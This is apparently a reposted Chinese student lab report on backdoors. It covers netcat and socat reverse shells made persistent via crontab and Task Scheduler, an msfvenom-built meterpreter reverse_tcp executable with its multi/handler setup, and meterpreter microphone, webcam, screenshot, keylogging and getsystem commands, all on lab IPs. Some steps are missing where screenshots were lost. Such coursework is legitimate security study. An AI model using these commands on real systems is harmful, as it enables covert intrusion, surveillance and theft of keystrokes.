20164322韩玉婷 -----Exp2 后门原理和实践
一、后门的概念? ? ? 后门是指那些绕过安全性控制而获取对系统访问权的程序 二、基础问题回答? ? ?(1)例举你能想到的一个后门进入到你系统中的可能方式? ? ? ? ? ?非官方网站下载应用程序时,该应用程序可能绑定了一些可执行文件,因此留下后门。或者当我们打开一个网页时,如果该网页会自动链接到木马程序的话,就会在后台自动下载安装木马的安装程序, ? ? ? ? 并会自动安装木马,生成可执行文件,以此在系统留下后门。 ? ? (2)例举你知道的后门如何启动起来(win及linux)的方式? ? ? ? ? ? Windows:设置为开机自启动、修改注册表项、用户执行带有后门的可执行文件 ? ? ? ? ? Linux:通过crontab功能将后门设为定时启动;也可以通过对正常软件绑定注入shellcode ? ? (3)Meterpreter有哪些给你映像深刻的功能? ? ? ? ? ? 在植入后门后,可以控制被控主机的shell,执行指令;获取被控主机的录音、录像、截图、键盘输入记录等。 ? ? (4)如何发现自己有系统有没有被安装后门? ? ? ? ? ? ?打开防火墙,查看有没有异常开放的端口; ? ? ? ? ? 安装杀毒软件,实时监控电脑,定时对系统进行检测;? 三、实验准备? ? ? 1、在实验前关闭或退出了防火墙、360杀毒软件、电脑卫士等所有的电脑保护软件,避免在实验过程中攻击时被拒绝。 ? ? ? 2、使用Windows获linux shell ? ? ? ? ? ? (1)在Windows下使用 ? ? ? ? ? ?(2)?使用ncat.exe程序打开监听 ? ? ? ? ? (3)?在kali中反弹连接Windows, ? ? ? ? ? ? ? ? ??Windows成功获得kali的shell。 ? ? ? ? ? ? ?3、使用linux获windows shell ? ? ? ? ? ? ?(1)使用ifconfig查看IP,为:192.168.33.131 ? ? ? ? ? ? ? ? ?? ? ? ? ? (2)打开监听 ? ? ? ? ? ? ? ??在Windows中反弹连接kali, ? ? ? ? ? ? ? ? kali成功获得Windows的命令提示 ? ? ? ? ?4、使用nc传输数据 ? ? ? ? ? ? ? Windows下监听4322端口, ? ? ? ? ? ? ?kali反弹连接到Windows的4322端口,
? ? 实验内容? ? ? 参数说明 ?
? 一、使用netcat获取主机操作Shell,cron启动 ? ? ? ?Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。 ? ? ? ? ? 在Windows系统下,监听4322端口 ? ? ? ? ? 在Kali环境下,用 ? ? ? ? 在最后一行添加45 ? ? ? ? 设置成45的原因是我当时的时间是14点42,为了能立马看到效果,所以我将时间设置成了45。保存并退出? :wq ? ? ? ? ? ? ? ? ? ? ?crontab -l?可查看配置的任务 ? ? ?? ? ? ? ? ? 当时间到了第22分时,win获得linux的shell,可执行相关命令 ? ? ?? ? 二、使用socat获取主机操作Shell,任务计划启动? socat: ? ? ? ? ? ? ? 在Windows系统下,打开:控制面板->系统和安全->管理工具->任务计划程序,在操作选项(菜单栏)中,选择“创建任务”,填写任务名称123,之后,新建触发器,选择开始任务时间为:工作站锁定时。 ? ? ? ? ? ? ??.新建操作,选择启动的程序为 (注:这里填写任务名称是第一次是123,但是由于出现问题,我重新做了一遍,然后第二次填写的任务名称是hyt,当时这部分的图已经截好了,所以没有截第二次,但是在任务三中用到该文件时文件名为hyt) ? ? ? ? ? ?创建完成之后,按Win+L?快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行, ? ?(但是不明白为什么,我再次打开后依旧没有运行,所以只好手动运行) ? ? ? 在kali终端输入指令socat - tcp:192.168.28.166:7777?(注:socat里面,必须有两个流,这里的第一个流[参数-]代表标准的输入输出,第二个流表示连接到Win7主机的7777端口),此时可发现已经成功获得了一个windows shell ? ?
? ?生成后门程序,指令为? ??msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.33.131 LPORT=4322 -f exe > hyt_backdoor.exe (注:这里设置的主机IP、端口为kali[攻击机]的IP、端口) ? win10上运行ncat命令,等待接收hyt_backdoor.exe? ncat.exe -lv 4322 > hyt_backdoor.exe
ncat -nv 192.168.230.1 4322 < hyt_backdoor.exe
?? ?在kali上使用msfconsole?指令进入msf控制台 ?进行配置: use exploit/multi/handler //使用handler模块 set payload windows/meterpreter/reverse_tcp //设置载荷,字面意思应该是基于TCP的反向连接反弹windows shell ? show options //查看利用模块的设置信息 set LHOST 192.168.28.181 //接下来的两个set是配置模块的设置信息,这里是设置本主机kali的IP set LPORT 7777 //设置本主机的端口 show options //再次查看一下options,确保设置正确 exploit //运行模块 ?查看kali,发现获得了win10主机的连接,并且得到了远程控制的shell,可执行相关命令 ? ? 四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权? 由上面的exploit操作,已经获得shell,接下来,尝试获取目标主机音频、摄像头、击键记录等内容 ? ? ? ?获取目标主机音频、截屏内容: record_mic //音频 screenshot //截屏 ? ? ? ? ? ? 效果如图:?? windows中有摄像设备,可以获取一下摄像头所拍摄相片(如图) ??kali上输入指令keyscan_start?,开始记录windows上任何键盘记录,随意在windows上输入一些字母,之后kali上输入指令keyscan_dump?,就可下载键盘记录 ? ?我在一个文档中输入了自己的学号(linux终端有显示) ? ? ?先使用getuid?指令查看当前用户,再使用getsystem?指令进行提权,但是提权失败,上网搜索原因,说是在windows机器上需要以管理员身份运行,才能提权,?所以我就以管理员的身份运行了一下 ? ? ? ? ?提权成功 ?实验感想:通过本次实验,我对网络安全方面的只是有了一些了解,之前学习的都比较理论,这种实际操作感觉很神奇,虽然现在的我仅仅只是了解后门的基本原理,但是我对信息安全的防护意识提高了。发现系统防范入侵的能力很低,所以之后一定要更加注重信息安全。 (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
- Azure VM Windows数据磁盘 – 如何知道它是HDD还是SSD?
- 20164317《网络对抗技术》Exp2 后门原理与实践
- windows-server-2008 – 一个全新的Windows Server网络构建
- Windows – Git配置别名不再起作用
- windows – 重定向当前IO设备以进行第三方例行交互
- 未解决的WiX中的符号引用(LGHT0094)(没有非法字符?)
- windows-7 – 通过powershell设置接口的MTU
- Windows Phone 7 – SkyDrive的编程访问
- windows-server-2008 – “SC.EXE config”和美元符号服务名
- windows-phone-7 – 仅限Windows Phone 8应用程序的DeviceU